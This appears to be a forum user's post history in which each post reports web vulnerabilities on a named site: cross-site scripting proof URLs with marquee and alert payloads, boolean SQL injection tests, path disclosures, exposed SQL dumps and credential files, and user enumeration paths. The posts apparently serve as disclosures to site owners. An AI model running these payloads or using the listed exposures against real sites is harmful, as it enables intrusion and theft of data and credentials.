agentsteal

Members • Posts: 230 • Last visited: Never

Everything posted by agentsteal

  1. Full Path Disclosure: http://home.acdx.net/g/list.php Full Path Disclosure: http://home.acdx.net/g/view.php Includes Directory: http://home.acdx.net/files/
  2. Cross Site Scripting: http://www.iwonderdesigns.com/nexus/demo/index.php?</script><marquee><h1>vulnerable</marquee> Cross Site Scripting: There is Cross Site Scripting if you post a comment that contains code. Cross Site Scripting: There is Cross Site Scripting if your password contains ">code. Cross Site Scripting: There is Cross Site Scripting if your username contains ">code. Full Path Disclosure: Includes Directory: http://www.iwonderdesigns.com/includes/ Includes Directory: http://www.iwonderdesigns.com/nexus/demo/include/ SQL Injection: http://www.iwonderdesigns.com/nexus/demo/index.php?a=view_doc&id=6 AND 1=1 http://www.iwonderdesigns.com/nexus/demo/index.php?a=view_doc&id=6 AND 1=2 User Enumeration: http://www.iwonderdesigns.com/~root User Enumeration: http://www.iwonderdesigns.com/~iwonderd
  3. Cross Site Scripting: http://www.fustrate.com/cgi-sys/scgiwrap/<marquee><h1>vulnerable</marquee> Full Path Disclosure: http://www.fustrate.com/cgi-sys/scgiwrap/ User Enumeration: http://www.che55.com/~root
  4. Cross Site Scripting: http://www.fustrate.com/cgi-sys/scgiwrap/<marquee><h1>vulnerable</marquee> Cross Site Scripting: There is Cross Site Scripting if your password contains code. Cross Site Scripting: There is Cross Site Scripting if your username contains code. Full Path Disclosure: http://www.fustrate.com/cgi-sys/scgiwrap/ Log: http://www.fustrate.com/log.txt User Enumeration: http://www.fustrate.com/~hoffman User Enumeration: http://www.fustrate.com/~root
  5. Admin Access: The SQL Injection in the forum reveals your password. Full Path Disclosure: http://www.klubdeutsch.com/view_topic.php SQL injection: http://www.klubdeutsch.com/view_topic.php?topic_id=56 AND 1=1 http://www.klubdeutsch.com/view_topic.php?topic_id=56 AND 1=2 User Enumeration: http://www.klubdeutsch.com/~klubiyfn User Enumeration: http://www.klubdeutsch.com/~root
  6. Array: http://www.policosmos.com/citizenshall.php?start[] Array: http://www.policosmos.com/table.php?topic=0&start[] Array: http://www.policosmos.com/table.php?topic[] Cross Site Scripting: http://www.policosmos.com/addfriend.php?delete="><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.policosmos.com/browse.php?show=<marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.policosmos.com/citizenshall.php?start=<marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.policosmos.com/cgi-sys/scgiwrap/<marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.policosmos.com/endorse.php?delete="><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.policosmos.com/phpinfo.php?<script>alert('vulnerable')</script> Cross Site Scripting: http://www.policosmos.com/submit_reg.php?email=<marquee><h1>vulnerable</marquee> Cross Site Scripting: There is Cross Site Scripting if the issues section contains code. Cross Site Scripting: There is Cross Site Scripting when you register if the fields contain code. Full Path Disclosure: http://www.policosmos.com/browse.php Full Path Disclosure: http://www.policosmos.com/citizenshall.php Full Path Disclosure: http://www.policosmos.com/cgi-sys/scgiwrap/ Full Path Disclosure: http://www.policosmos.com/phpinfo.php Full Path Disclosure: http://www.policosmos.com/table.php?topic=0&start[] Full Path Disclosure: http://www.policosmos.com/test.php Full Path Disclosure: There is Full Path Disclosure when you register. Full Path Disclosure: There is Full Path Disclosure if you upload an invalid avatar. Maximum Length: If you edit the input boxes when you register you can remove the maximum lengths. 
SQL Injection: http://www.policosmos.com/blog.php?delete=36 AND 1=1 http://www.policosmos.com/blog.php?delete=36 AND 1=2 SQL Injection: http://www.policosmos.com/browse.php?find=endorsements&user=107 AND 1=1 http://www.policosmos.com/browse.php?find=endorsements&user=107 AND 1=2 SQL Injection: http://www.policosmos.com/mail.php?delete=211 AND 1=1 http://www.policosmos.com/mail.php?delete=211 AND 1=2 User Enumeration: http://www.policosmos.com/~policosmos User Enumeration: http://www.policosmos.com/~root User Enumeration: http://www.policosmos.com/~zeus
  7. Cross Site Scripting: http://www.tutorialstuff.com/cgi-sys/scgiwrap/<marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.tutorialstuff.com/tutorial_category.php?category=<marquee><h1>vulnerable</marquee> Full Path Disclosure: http://www.tutorialstuff.com/cgi-sys/scgiwrap/ Full Path Disclosure: http://www.tutorialstuff.com/?s SQL Injection: http://www.tutorialstuff.com/tutorial_display.php?id=100 AND 1=1 http://www.tutorialstuff.com/tutorial_display.php?id=100 AND 1=2 User Enumeration: http://www.tutorialstuff.com/~tinymike
  8. Cross Site Scripting: There is Cross Site Scripting if your password contains ">code. Cross Site Scripting: There is Cross Site Scripting if your username contains ">code.
  9. Admin Access: Your thumbs.db files contain your username and password.
  10. SQL Dump: http://www.blushcentral.com/sql/
  11. Admin Access: You can post news without logging in. Cross Site Scripting: There is Cross Site Scripting if you post a comment that contains code. Cross Site Scripting: There is Cross Site Scripting if you post news that contains code.
  12. Cross Site Scripting: There is Cross Site Scripting if your username contains code.
  13. Cross Site Scripting: There is Cross Site Scripting if your password contains code. Cross Site Scripting: There is Cross Site Scripting if your username contains code. SQL Dump: http://www.mp3crib.com/sql/
  14. Cross Site Scripting: There is Cross Site Scripting if the Expect header contains code. Cross Site Scripting: There is Cross Site Scripting if your username contains code. Drop Down Menu: If you edit the drop down menu on http://www.uklovebug.co.uk/rate_me.php you can submit arbitrary values. User Enumeration: http://www.uklovebug.co.uk/~root
  15. Multiple users can register with the same username. User Enumeration: http://www.chatcubed.com/~root
  16. Full Path Disclosure: http://yaz.pixelradio.net/includes/footer.php Full Path Disclosure: http://yaz.pixelradio.net/~yaz PHP Source Code Disclosure: http://yaz.pixelradio.net/*******/*****.txt User Enumeration: http://yaz.pixelradio.net/~yaz
  17. Cross Site Scripting: http://www.thefreebielife.com/<marquee><h1>vulnerable</marquee>
  18. Cross Site Scripting: http://www.skatevid.net/upload/uu_finished.php?temp_dir=<marquee><h1>vulnerable</marquee>
  19. SQL Injection: http://www.rockypages.com/classified_type?type=1 AND 1=1 http://www.rockypages.com/classified_type?type=1 AND 1=2
  20. Cross Site Scripting: http://www.ibswebview.com/phpinfo.php?<script>alert('vulnerable')</script> Full Path Disclosure: http://www.ibswebview.com/phpinfo.php User Enumeration: http://www.ibswebview.com/~root
  21. Admin Access: http://www.corlewland.com/church/home/ contains your username and password. Cross Site Scripting: http://www.corlewland.com/church/biblesearch.php?book_name=<marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.corlewland.com/church/calendar.php?day=<marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.corlewland.com/church/prayer_request.php?pagein=<marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.corlewland.com/church/printc.php?usage=<marquee><h1>vulnerable</marquee> Drop Down Menu: If you edit the drop down menu on http://www.corlewland.com/guestbook.php you can submit arbitrary values. PHP Source Code Disclosure: http://www.corlewland.com/church/home/ User Enumeration: http://www.corlewland.com/~root
  22. Full Path Disclosure: http://www.mattdsworld.com/wp/wp-admin/admin-footer.php Full Path Disclosure: http://www.mattdsworld.com/wp/wp-admin/admin-functions.php Full Path Disclosure: http://www.mattdsworld.com/wp/wp-admin/edit-form-advanced.php Full Path Disclosure: http://www.mattdsworld.com/wp/wp-admin/edit-form-comment.php Full Path Disclosure: http://www.mattdsworld.com/wp/wp-admin/edit-form.php Full Path Disclosure: http://www.mattdsworld.com/wp/wp-admin/edit-link-form.php Full Path Disclosure: http://www.mattdsworld.com/wp/wp-admin/edit-page-form.php Full Path Disclosure: http://www.mattdsworld.com/wp/wp-admin/menu-header.php Full Path Disclosure: http://www.mattdsworld.com/wp/wp-admin/menu.php Full Path Disclosure: http://www.mattdsworld.com/wp/wp-includes/default-filters.php Full Path Disclosure: http://www.mattdsworld.com/wp/wp-includes/kses.php Full Path Disclosure: http://www.mattdsworld.com/wp/wp-includes/locale.php Full Path Disclosure: http://www.mattdsworld.com/wp/wp-includes/rss-functions.php Full Path Disclosure: http://www.mattdsworld.com/wp/wp-includes/template-loader.php Full Path Disclosure: http://www.mattdsworld.com/wp/wp-includes/vars.php Full Path Disclosure: http://www.mattdsworld.com/wp/wp-includes/wp-db.php Full Path Disclosure: http://www.mattdsworld.com/wp/wp-settings.php User Enumeration: http://www.mattdsworld.com/~root
  23. Full Path Disclosure: http://fusionware.ourproject.org/itech/microforum/newprofile.php User Enumeration: http://fusionware.ourproject.org/~root
  24. Cross Site Scripting: http://www.podja.co.uk/billing/contact.php?email="><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.podja.co.uk/billing/contact.php?name="><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.podja.co.uk/billing/contact.php?subject="><marquee><h1>vulnerable</marquee> User Enumeration: http://www.podja.co.uk/~root
  25. Cross Site Scripting: http://www.file-city.co.uk/phpinfo.php?<script>alert('vulnerable')</script> Full Path Disclosure: http://www.file-city.co.uk/phpinfo.php